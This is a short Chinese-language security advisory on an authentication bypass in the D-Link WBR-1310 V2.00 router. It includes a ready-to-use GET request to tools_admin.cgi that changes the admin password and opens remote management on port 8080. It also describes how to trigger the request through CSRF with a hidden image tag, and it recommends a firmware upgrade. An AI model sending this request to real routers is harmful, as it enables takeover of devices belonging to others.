D-Link WBR-1310 Authentication Bypass Vulnerability

漏洞概述

WBR-1310允许远程用户修改管理配置进行授权绕过,在未开启远程管理时也可以通过CSRF触发。

影响产品

WBR-1310 V2.00

漏洞描述

CGI脚本未进行有效的登录凭据验证。可通过构造HTTP请求修改管理设置。

修改管理员密码为 hacked,并开启8080端口允许远程访问

http://192.168.0.1/tools_admin.cgi?
admname=admin&admPass1=hacked&admPass2=hacked&username=user&userPass1=WD
B8WvbXdHtZyM8&userPass2=WDB8WvbXdHtZyM8&hip1=*&hport=8080&hEnable=1

可通过CSRF漏洞发送GET请求触发

漏洞影响

允许远程管理,接管路由器

通过web页面隐藏image tag,触发链接修改管理员密码和允许远程连接

修复建议

升级固件

参考资料

http://www.devttys0.com/wp-content/uploads/2010/12/wbr310_auth_bypass.pdf

您可能还喜欢...